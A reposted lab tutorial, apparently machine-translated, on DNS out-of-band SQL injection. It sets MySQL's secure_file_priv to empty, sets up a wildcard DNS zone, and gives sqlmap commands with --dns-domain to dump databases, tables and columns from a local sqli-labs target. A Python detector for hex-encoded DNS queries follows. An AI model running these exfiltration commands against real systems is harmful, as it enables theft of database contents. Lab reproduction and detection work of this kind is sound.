Reproducing DNS out-of-band data exfiltration with sqlmap

2022-08-10 06:33:00 fish pass ruler zz

Set MySQL's secure_file_priv variable

If secure_file_priv is empty, load_file can read files from any directory on the disk.
If secure_file_priv is D:\, load_file can read only the files on the D: drive.
If secure_file_priv is NULL, load_file cannot load files.
Add the line secure_file_priv="" to the MySQL configuration file.

Configure the DNS server

1. Add the DNS server role.
2. Add a forward lookup zone.
3. Create a new host record.
The IP address is that of the virtual machine where sqlmap runs.
Create a wildcard record.
From the virtual machine, ping the name just set up on the server, then run tcpdump -n port 53 on Kali and check the information returned.
4. Create a conditional forwarder.

Out-of-band DNS injection with sqlmap

Get the databases

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" --dbs

Get the tables

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables

Get the columns

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -T "users" --columns

insert image description here
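The tcpdump -n port 53 check from the DNS server setup is also where this technique becomes visible to a defender. The following Python sketch is an added example, not code from the original post: it scans tcpdump output for queries under a monitored zone that carry a hex-encoded label and decodes what was leaked. The sample capture is constructed, and the prefix.hex.suffix.zone query shape and the function name find_exfil are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of `tcpdump -n port 53` output (not captured from the lab).
# Assumed query shape: <prefix>.<hex data>.<suffix>.<zone>
SAMPLE = """\
06:31:02.101 IP 172.16.10.130.53211 > 172.16.10.131.53: 4242+ A? www.nanhang.top. (33)
06:31:05.412 IP 172.16.10.130.53212 > 172.16.10.131.53: 4243+ A? qzx.7365637572697479.kpw.nanhang.top. (54)
06:31:09.877 IP 172.16.10.130.53213 > 172.16.10.131.53: 4244+ A? qzx.656d61696c73.kpw.nanhang.top. (50)
06:31:11.020 IP 172.16.10.140.40110 > 172.16.10.131.53: 911+ AAAA? mail.example.org. (34)
06:31:14.303 IP 172.16.10.130.53214 > 172.16.10.131.53: 4245+ A? qzx.7573657273.kpw.nanhang.top. (48)
"""

# Captures: source IP, query type, query name of a request sent to port 53.
QUERY_RE = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.\d+ > \S+\.53: \d+\S* (\w+)\? (\S+?)\.? \("
)
# A label made only of hex byte pairs, at least 4 bytes long.
HEX_LABEL = re.compile(r"(?:[0-9a-f]{2}){4,}")


def find_exfil(capture, zone):
    """Return {source_ip: [(query_name, decoded_text), ...]} for suspicious queries."""
    hits = defaultdict(list)
    suffix = "." + zone.lower()
    for line in capture.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue  # not a DNS request line
        src, name = m.group(1), m.group(3).lower()
        if not name.endswith(suffix):
            continue  # query is outside the monitored zone
        for label in name[: -len(suffix)].split("."):
            if HEX_LABEL.fullmatch(label):
                decoded = bytes.fromhex(label).decode("utf-8", "replace")
                hits[src].append((name, decoded))
    return dict(hits)


if __name__ == "__main__":
    for src, items in find_exfil(SAMPLE, "nanhang.top").items():
        for name, decoded in items:
            print(f"{src} {name} -> {decoded!r}")
```

Short hex strings can occur in legitimate names, so a hit is a lead to correlate with web and database logs rather than proof on its own.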

Copyright notice
This article was written by [fish pass ruler zz]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/222/202208100547536332.html